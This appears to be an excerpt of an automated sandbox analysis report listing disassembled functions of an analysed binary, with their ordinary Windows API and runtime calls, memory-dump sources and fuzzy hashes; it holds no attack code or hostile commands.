                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CF05E78C0020C77CF05FBE5CC47DDEB7BCAE04340F904425BA20AA192EBB4BA19C696
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(6A5D6A2C,00000000,?,6A56CF80,00000064,?,6A547EBD,6A5D7224,AA831995,?,00000000,6A58C51D,000000FF,?,6A5659D2), ref: 6A56D010
                                                                                                                                                                                                                                                                          • WaitForSingleObjectEx.KERNEL32(00000000,00000000,?,6A56CF80,00000064,?,6A547EBD,6A5D7224,AA831995,?,00000000,6A58C51D,000000FF,?,6A5659D2), ref: 6A56D021
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(6A5D6A2C,?,6A56CF80,00000064,?,6A547EBD,6A5D7224,AA831995,?,00000000,6A58C51D,000000FF,?,6A5659D2), ref: 6A56D028
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeaveObjectSingleWait
                                                                                                                                                                                                                                                                          • String ID: ,j]j
                                                                                                                                                                                                                                                                          • API String ID: 501323975-747776563
                                                                                                                                                                                                                                                                          • Opcode ID: 6c8c93b1855324e3b533162090fcc08c66d32e2cd5c0edd89de6e4a14c57909f
                                                                                                                                                                                                                                                                          • Instruction ID: dc73d124526a3c6aa417bb28ef0d985c4ae072d248ed272e469e0539f0b56553
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c8c93b1855324e3b533162090fcc08c66d32e2cd5c0edd89de6e4a14c57909f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9E06536661624F7CF11FB54CC0498D3EA9FB0E661B129002F645D9520CF315C5297D5
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00459EA0,?,?,00349867,00000064,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560), ref: 003498F7
                                                                                                                                                                                                                                                                          • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00349867,00000064,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560), ref: 00349908
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00459EA0,?,00349867,00000064,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010), ref: 0034990F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeaveObjectSingleWait
                                                                                                                                                                                                                                                                          • String ID: v
                                                                                                                                                                                                                                                                          • API String ID: 501323975-3261393531
                                                                                                                                                                                                                                                                          • Opcode ID: 2f7882d5bacbb36fc9c62fcee381cf5b1b6c818de9a59c8cce88a60b7b3778f0
                                                                                                                                                                                                                                                                          • Instruction ID: ecad14354844bbc14a1aed17257321a1a14a5cfdaf919e0edbe7ca6a7f1e31e7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f7882d5bacbb36fc9c62fcee381cf5b1b6c818de9a59c8cce88a60b7b3778f0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27E09232551224EBCB035F84EC0AF8E3F1DAB05B52F144022FD0DA61B1CB657C008BD9
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                            • Part of subcall function 002D2400: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000010), ref: 002D242D
                                                                                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 002D267E
                                                                                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 002D26DE
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 002D2972
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 002D29FF
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer_wcschr_wcsrchr$FileHeapModuleNameProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1360097548-0
                                                                                                                                                                                                                                                                          • Opcode ID: 63b2e5a90aefa6be50c2cfccd491f68bf4b0e81ed1e9cf037ca39cefa0d64710
                                                                                                                                                                                                                                                                          • Instruction ID: af301c2509f04dbd7ca3d4d14276a0179e106ee118060b89cf19a051168c9b87
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63b2e5a90aefa6be50c2cfccd491f68bf4b0e81ed1e9cf037ca39cefa0d64710
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2F1A271A10609DFDB10DFA8C849BAEF7B4EF54314F14826EE915AB391DB709D18CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNEL32(AA831995,?,00000000,?), ref: 6A57FC98
                                                                                                                                                                                                                                                                            • Part of subcall function 6A58390C: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6A57E885,?,00000000,-00000008), ref: 6A5839B8
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6A57FEF3
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6A57FF3B
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6A57FFDE
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2112829910-0
                                                                                                                                                                                                                                                                          • Opcode ID: fb4b0bc670df57c077e99d1a73d3bed31a38b11cd5a42cf3039b58b7a7f086b0
                                                                                                                                                                                                                                                                          • Instruction ID: d8336e08fd8ada9fa725fa5aa69a1e7b6101a21679adb3bf1cd9db1e62bfd3d0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb4b0bc670df57c077e99d1a73d3bed31a38b11cd5a42cf3039b58b7a7f086b0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41D14AB5D04258AFCF11CFA8C88499DBBB5FF49314F15452AE865F7242DB30E946CB50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                          • Opcode ID: 9dd6286502b4482c460da9972ee67207c58e0b020ae9a4757e6b6ac0a6ea6060
                                                                                                                                                                                                                                                                          • Instruction ID: 6d3da7deb243d585bd34f22d3b5b20c6e2fb4bea89b1f584d57c8b5c79349c22
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9dd6286502b4482c460da9972ee67207c58e0b020ae9a4757e6b6ac0a6ea6060
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A51D372645606EFEB26CF14D840BAE77F4EF81318F12442AE91967295EF32DE41CB50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 002AA77A
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 002AA79C
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 002AA7C4
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 002AA931
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 593203224-0
                                                                                                                                                                                                                                                                          • Opcode ID: c5d727d4c1620e131a2e777be8164a793e0e42c3054a992309da84f2d21298b9
                                                                                                                                                                                                                                                                          • Instruction ID: a4581521bb553ae617952de0af3b48e408f1df766127770ca677146eea2dca95
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5d727d4c1620e131a2e777be8164a793e0e42c3054a992309da84f2d21298b9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13617AB1C10645CFDB11CF58C941BAEBBF4EF15310F1482A9E845AB292EB74AE85CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,DF534560,?,?,?), ref: 002CC96A
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,DF534560,?,?,?), ref: 002CC98A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                          • String ID: t=$t=
                                                                                                                                                                                                                                                                          • API String ID: 2962429428-1428659785
                                                                                                                                                                                                                                                                          • Opcode ID: 355ec49a6cbca481a835a7434894a27714664a9ea282bb6d6c3a9abcd8ad3d06
                                                                                                                                                                                                                                                                          • Instruction ID: 7cbac05e0d419e7ce2a06c96f2d0ddafe36274a9e8518439b631c73c93fe9deb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 355ec49a6cbca481a835a7434894a27714664a9ea282bb6d6c3a9abcd8ad3d06
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E513730901A4ADFE711CF68C948B5AFBF4EF49310F1482A9D449DB2A1EB74EA04CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 002B0B64
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 002B0B86
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 002B0BAE
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 002B0CC1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 593203224-0
                                                                                                                                                                                                                                                                          • Opcode ID: 521f69a09987b269b3b52860d6754787920e595a9d67bf631ef64022dca62509
                                                                                                                                                                                                                                                                          • Instruction ID: e53953d1fbd95c95a0a46e5ee2d455314954bb9bef78dc79b83ad2a151a72c33
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 521f69a09987b269b3b52860d6754787920e595a9d67bf631ef64022dca62509
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93518F71910349DFDB12CF58C880BAEBBF4EB00758F248669E845AB381D7B5AE05CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,?,?,00000000,00000000), ref: 002D457F
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000,00000000), ref: 002D458C
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 002D45A9
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 002D45CB
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                          • Opcode ID: 9218aafaeb6ccbb8b9d24f6c75c675917e1f5a1bf760088acf801e8cdbd5943c
                                                                                                                                                                                                                                                                          • Instruction ID: 027b0a422aa65537ab602eda3f1beb1aa31cc3fb9f99c1fffa61f1e8b6e6d418
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9218aafaeb6ccbb8b9d24f6c75c675917e1f5a1bf760088acf801e8cdbd5943c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B3108B6750316BBD710AF54EC82F56B79CEB54B44F20012AFA05973C0DB71BD258BA4
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(DF534560,DF534560,?), ref: 001D17CF
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,DF534560,?), ref: 001D17DC
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?), ref: 001D18B3
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                                                                                                                          • String ID: v
                                                                                                                                                                                                                                                                          • API String ID: 3991485460-3261393531
                                                                                                                                                                                                                                                                          • Opcode ID: bd225c77e1a4a7b561aeb3888cb646d7c5ce0362e0547a1d16a62e3dbb9728c0
                                                                                                                                                                                                                                                                          • Instruction ID: bc16d74b720f9944795c060c9404482b42e0a9f69af901b28d47beb59cfa7bc0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd225c77e1a4a7b561aeb3888cb646d7c5ce0362e0547a1d16a62e3dbb9728c0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A41C435600745EFDB22CF68C840BAABBB5EF55310F10452AE996D7391CB31E915DB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 6A58390C: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6A57E885,?,00000000,-00000008), ref: 6A5839B8
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6A583D76
                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6A583D7D
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 6A583DB7
                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6A583DBE
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1913693674-0
                                                                                                                                                                                                                                                                          • Opcode ID: 701c158e7603d4d8d13c9ab5e0075daca4776fece1b8a8abe86d5e21fe0a4b8e
                                                                                                                                                                                                                                                                          • Instruction ID: 375cc5def2511de312cb22087d05db4beb2318a51b8361c270dd30aae9f1f74c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 701c158e7603d4d8d13c9ab5e0075daca4776fece1b8a8abe86d5e21fe0a4b8e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59217FF1705625AFDB61DF65C88481BF7B9FF413B87018919E929A7251DF30EC008BA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
